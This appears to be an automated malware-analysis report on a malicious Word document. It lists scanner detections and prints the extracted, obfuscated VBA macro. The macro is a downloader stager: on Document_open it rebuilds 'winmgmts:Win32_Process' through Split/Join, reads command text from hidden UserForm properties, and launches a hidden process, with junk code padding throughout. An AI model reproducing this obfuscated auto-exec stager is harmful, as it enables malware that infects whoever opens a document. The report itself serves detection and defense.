Verdict: MALICIOUS
Risk Score: 292
Heuristics: 9

- ClamAV: Doc.Downloader.Sagent-7454445-0 (critical) [CLAMAV_DETECTION]
  ClamAV detected this file as malware: Doc.Downloader.Sagent-7454445-0
- Malformed OLE auto-open stager with embedded ZIP payload (critical) [OLE_RAW_MALFORMED_AUTOOPEN_STAGER]
  Raw malformed OLE bytes contain an auto-open macro entry, embedded ZIP/theme package bytes, VBA project metadata, and URL/CMD/Shell staging tokens. This is a high-confidence exploit-builder shape where the OLE directory is intentionally malformed, preventing normal VBA extraction while leaving the auto-run stager visible in raw streams.
- VBA macros detected (medium, 4 related findings) [OLE_VBA_MACROS]
  Document contains VBA macro code.
- VBA UserForm hidden-property command stager (critical) [OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER]
  VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  Matched line in script: `Uudkpimgyjqmq = Join(Split("winOMDNmgmOMDNts:WiOMDNn32_OMDN", "OMDN"), "") + Xmtcmcovmi.Zepmlzbwtd + "rocess"`
- CreateObject call (high) [OLE_VBA_CREATEOBJ]
  Matched line in script: `Set Kazylkuzf = CreateObject(Null & Uudkpimgyjqmq)`
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
  Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Document_Open macro (low) [OLE_VBA_DOCOPEN]
  Matched line in script: `Private Sub Document_open()`
- Suspicious extracted artifact (info) [EXTRACTED_FILE_STATIC_TRIAGE]
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info) [EMBEDDED_URL]
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10946 bytes |

SHA-256: 8495340664534ab71148e9fa8c1206b3621a39d006fdb47cb146c469f25588ae

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 239 of 353 identifiers look randomly generated (e.g. 'winOMDNmgmOMDNts'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "Xmtcmcovmi"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Zepmlzbwtd, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Rbheeuczuaa = Gxrukoktavibm
Dompqccdqcind = Iiulysaldrcy
Ycrwgwgol = Dubrcagaimaga
Select _
Case Dcixnelx
Case 621
Qrxwmuxg _
= Hex _
(931)
Xyubqvxjtyvr = CVar(619)
Sdfnasrx _
= Hex(243)
Case 261
Ljjdvscaleg = CVar(121)
Hhsgbdsez _
= 28
Eiojgwdapdph = CDate _
(56)
Case 646
Nbvvfrvnvxgi = _
CInt(788)
Trmlonyndsu = Log(Fpfrzflo)
Judzqnqdxknhx = Szvaxcaqp
End Select
Wxyyfcuajiy = Ubrykrbtb
Zptoummdgm = Veclfzpmd
Lcbngutyvuo = Iggwwuruywv
Select _
Case Gwtlqgjail
Case 930
Fjnnakgfmczst _
= Hex _
(67)
Yumfftynx = CVar(97)
Dippaunxql _
= Hex(575)
Case 201
Ymppwdxar = CVar(143)
Kfvfnggvqjpgy _
= 896
Bffwzxuontqeb = CDate _
(655)
Case 489
Dsdkfjfozrkpn = _
CInt(65)
Fqazbsvvba = Log(Hmxcelqfwdn)
Wqfepigreoz = Ighxbkps
End Select
Zgewhemwrzvse = Ehukrdgrajm
Ojqeaobvjdr = Etlelbmygegsu
Oemujyihiqrp = Ueceszmgvxli
Select _
Case Ekmguigfq
Case 402
Awmdotlifladn _
= Hex _
(660)
Giipjbjacydl = CVar(697)
Mpofhrdacgdza _
= Hex(546)
Case 807
Egzeycxwanvrv = CVar(445)
Kiqmtwlyg _
= 833
Fgcmkbzexreg = CDate _
(798)
Case 95
Osnsmahqxwui = _
CInt(963)
Zsisugwruod = Log(Rlnfcusedxft)
Pifrbniefj = Pwxyzosiqe
End Select
Szurvytvyyqw
End Sub
Attribute VB_Name = "Rlndryuf"
Attribute VB_Base = "0{53A8F9CE-F62A-424E-B48F-7773908C8B41}{98A791E9-1E45-466D-8930-7B5DEEEE7885}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Sfxuqprex"
Function Gffrrmoptrb()
Pqtrejezznzb = Kasmtzhjhjls
Kttkhaqapomnr = Orkhyodbgzo
Ikgmzfpfu = Jajkdzgidtsr
Select _
Case Kkgsmktnks
Case 452
Anlokubpx _
= Hex _
(634)
Tygtgjmpt = CVar(250)
Ovinhfbw _
= Hex(417)
Case 906
Fuyswpjypln = CVar(20)
Nufrmdydl _
= 899
Yqfwnwob = CDate _
(947)
Case 866
Odiajudrdum = _
CInt(78)
Vtbnosrntry = Log(Jmkswmeqz)
Qdivmhinwakdl = Iqbuljhd
End Select
Wcqjsesti = Xmtcmcovmi.Zepmlzbwtd
Qswfsxekcft = Mtbbpcur
Uszoieuwtnhh = Bzacvridzpm
Vitpxbybn = Vfiiaqsfjm
Select _
Case Brwylqtkczv
Case 592
Zyjgmnngrhp _
= Hex _
(681)
Diwhzwvr = CVar(966)
Bcmkthgvjjuar _
= Hex(879)
Case 330
Wymjjkhplnkou = CVar(521)
Cwhaidaduzllf _
= 349
Dqnhcyjih = CDate _
(699)
Case 131
Naxjsmvkgxsr = _
CInt(414)
Wurkyzbqfktbm = Log(Toanppzg)
Zqvrikznl = Rxinrxvm
End Select
Nhgjclmumuee = Wcqjsesti + Rlndryuf.Qgqdkfeugdwb + Rlndryuf.Mqzqbhomi + Rlndryuf.Cighjeqo
Csgrspqptzf = Rezgxsbuauv
Bumpkdxaqb = Fvfuqrqzeup
Dsaucxkzjowce = Lqbchqsw
Select _
Case Jdesehef
Case 984
Lxfodgpvh _
= Hex _
(940)
Mcpootnzjkve = CVar(58)
Uggegrxphqnk _
= Hex(435)
Case 966
Bbwpnixbpeqnq = CVar(316)
Wqtlvjair _
= 407
Uxuyaegpxho = CDate _
(105)
Case 609
Lvtqcntaqik = _
CInt(672)
Yrpaseovoagq = Log(Hbiyikcaap)
Dhqdokygf = Xpjrvwun
End Select
Bclbzisy = Nhgjclmumuee + Rlndryuf.Qbctdshrrq + Rlndryuf.Jsbztqzyrzvlq.ControlTipText
Vafdqhsswlcgg = Ybdlfplezbia
Acytwxwrynqra = Dwsguqglxc
Wfcigrvvie = Gxhdpvnows
Select _
Case Pufgtrbqo
Case 604
Mwfjaftc _
= Hex _
(716)
Izxjdwbpu = CVar(26)
Jxsllobr _
= Hex(839)
Case 326
Vtxugjlmicqww = CVar(701)
Ixquzbuzwczm _
= 539
Rrlxlnfaowm = CDate _
(721)
Case 891
Llnnamqd = _
CInt(732)
Wcvbtashwn = Log(Kezktphitiky)
Ipyahlzgpuq = Zwopbfuaio
End Select
Gffrrmoptrb = Obmmagkq + Bclbzisy + Obmmagkq
Rgsnxjbvaf = Nqprefwxbff
Vbobowxdszlj = Pueqimmbfjc
Qcklbmucintm = Lvqehrphdwpw
Select _
Case Tveztdhbh
Case 402
Xsohgldzsb _
= Hex _
(147)
Fucdjznwesn = CVar(925)
Jusflknctk _
= Hex(717)
Case 986
Zwllxafn = CVar(506)
Frzybtrffffux _
= 907
Tgrsmlkddj = CDate _
(778)
Case 520
Khrhvgkp = _
CInt(390)
Nitknfuvf = Log(Adtovtmunwoz)
Ynxknmckn = Ybxfjhddh
End Select
End Function
Function Szurvytvyyqw()
Rsifgdnhf = Rnkwwvsf
Qfbcbbrdqiyen = Rlqhfgbvxbtsv
Mpbhbnhc = Wepdfmaz
Select _
Case Kbyutpkd
Case 370
Jvhnvjdfkk _
= Hex _
(543)
Mfjblrsptt = CVar(63)
Skqgolddbwra _
= Hex(176)
Case 404
Iwjuonta = CVar(599)
Lrdsklpqypul _
= 630
Ryhghpniejjwf = CDate _
(512)
Case 598
Jyruyuwik = _
CInt(150)
Gbchhxdmcqf = Log(Aecmtiofqlor)
Tbvqxnrjlgx = Stwnelyuur
End Select
Uudkpimgyjqmq = Join(Split("winOMDNmgmOMDNts:WiOMDNn32_OMDN", "OMDN"), "") + Xmtcmcovmi.Zepmlzbwtd + "rocess"
Vxhspivbgesne = Toinoqsmmesw
Xumhsuqwnu = Hltvdabfpkuck
Kuowlfoj = Gludwanho
Select _
Case Trbsvjxma
Case 593
Ksgczyutsbjox _
= Hex _
(866)
Bsjgvvyvq = CVar(548)
Eqvrwjxjbc _
= Hex(721)
Case 458
Bpnvrfjdecoh = CVar(689)
Toalwpym _
= 399
Xafzronf = CDate _
(197)
Case 931
Irhahpgaibbnm = _
CInt(566)
Iiqfhvpujxq = Log(Lppjdhubga)
Iydscjomi = Xzwbtwydq
End Select
Set Kazylkuzf = CreateObject(Null & Uudkpimgyjqmq)
Cwjrkmmmvkr = Wbtboovn
Xczedypvnxhs = Iwkaumzkmk
Godlgaccm = Ijofoeksej
Select _
Case Revsnumqplwr
Case 616
Bqhqpxskbrfh _
= Hex _
(106)
Broxxvlhl = CVar(308)
Hzzwwmxevcu _
= Hex(75)
Case 658
Tlagcdngjgo = CVar(871)
Ztghueaahxtof _
= 443
Cpdhgadlu = CDate _
(422)
Case 699
Htiytkyzm = _
CInt(726)
Nhplnlohsxygd = Log(Hqxvhmdp)
Rjejpfsdf = Rvmrxnmhjnfd
End Select
Yfqnbnriqp = Uudkpimgyjqmq + Rlndryuf.Isqpsnihjumy.ControlTipText + Rlndryuf.Ycsvbedywa.ControlTipText
Skievftvm = Hvttfhtszpcx
Hewixzqd = Uceapwzarbx
Xymuekrqnt = Bxmpoddhcyc
Select _
Case Ccpbfmfatzjk
Case 396
Twahjcmnzm _
= Hex _
(84)
Ytzhyvka = CVar(130)
Bphhwnhyd _
= Hex(165)
Case 645
Rkkcrtzhpc = CVar(885)
Combmaozell _
= 394
Zcgyfbjgug = CDate _
(232)
Case 3
Egbltlfxafs = _
CInt(537)
Vxofdgzpss = Log(Ijbtjiidmhum)
Zgxkujwlkd = Qzjzmoks
End Select
Ibeipjepmqn = Yfqnbnriqp + Xmtcmcovmi.Zepmlzbwtd
Fydbrqhiykqps = Zgylllgh
Aucpsjdilz = Wogmhguzzhhnu
Zgmzratrves = Nhhtoajk
Select _
Case Dzndjsnpvbtdc
Case 639
Vzdwkhpaslszo _
= Hex _
(117)
Ieuhizdxjzip = CVar(383)
Hkfitsbfn _
= Hex(941)
Case 971
Ozvrrtzqbtpj = CVar(218)
Zsbuxcssvkb _
= 992
Ufscrapuaif = CDate _
(742)
Case 714
Jyvlsbksu = _
CInt(613)
Lqszwdkqecekj = Log(Ifvyjwbrstwkr)
Yaftrbiq = Xpodenmuusewv
End Select
Set Szurvytvyyqw = CreateObject(Ibeipjepmqn)
Krykiajrkyas = Eamauxnw
Dciwsvzngfibt = Yxqppoeqstp
Rmgnubhf = Zoymmqtcgt
Select _
Case Awhhiympccayw
Case 14
Vgslkgkrarbsz _
= Hex _
(583)
Jbrumjgnsit = CVar(468)
Wozpsryvoi _
= Hex(734)
Case 908
Pfgphgmrlty = CVar(928)
Hpotzcqf _
= 912
Mrlzizvutrfw = CDate _
(678)
Case 947
Xlchkxdqsolck = _
CInt(50)
Fjjpktxvger = Log(Eqvlkovnzjucr)
Xofpsfohvhuga = Dthelcsasvhcf
End Select
Szurvytvyyqw.XSize = False * False
Euvbabtlxuls = Olsbdueefv
Kbxmscoae = Sdxhxogfl
Vwhwdsozp = Wrsnkbjey
Select _
Case Hayfnhqzplpe
Case 12
Fwywmfee _
= Hex _
(304)
Fojdewhqx = CVar(461)
Gyxfgipktgm _
= Hex(555)
Case 807
Ffkhlcrcnq = CVar(452)
Xmutdygflyxbr _
= 146
Ottatbwyzlzfv = CDate _
(84)
Case 662
Thxgjwvqqh = _
CInt(187)
Bghjqffdj = Log(Hwaovietlwy)
Ekwasddtmtu = Cizpfdarqkii
End Select
Szurvytvyyqw.YSize = False * False
Taksmhrhgvux = Kctmnftswq
Mdoynjgwryiji = Vcyimskkbyg
Bbetcnvo = Hkrgvluje
Select _
Case Ypyicgcsnzh
Case 220
Vpuogulzb _
= Hex _
(286)
Yvmoygocqkc = CVar(629)
Lagtwfiay _
= Hex(829)
Case 746
Frfdjvrwvh = CVar(73)
Unthlfwvs _
= 629
Dgosdwlqzjb = CDate _
(649)
Case 883
Alsutgpya = _
CInt(339)
Fcxxvcqsbd = Log(Udnakrkxsemha)
Cmopdncm = Ovxtiheyoxrff
End Select
Do While Kazylkuzf.Create(Null & Gffrrmoptrb, Vsmziygohc, Szurvytvyyqw)
Loop
Wjazfbzfrfnbo = Oxurkgblrcb
Glhnyhicqjazu = Llfpevqlpmrs
Jxdjzzgxadgdk = Trphjzgwmne
Select _
Case Sagomehlxquyl
Case 715
Ciaksxwvbk _
= Hex _
(728)
Dbqvvjgfawrrg = CVar(217)
Vauiylvt _
= Hex(875)
Case 984
Uwcveeeagek = CVar(452)
Zoeikfqjecva _
= 408
Bnlhhlian = CDate _
(443)
Case 152
Vrnqzmrogv = _
CInt(90)
Dlnodqugvjxc = Log(Wcvlybayonct)
Emolhuiwuxf = Ypmukdepotuw
End Select
End Function